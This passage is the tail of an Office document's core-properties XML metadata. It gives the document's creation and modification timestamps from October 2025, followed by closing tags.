  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-17T11:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-22T11:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>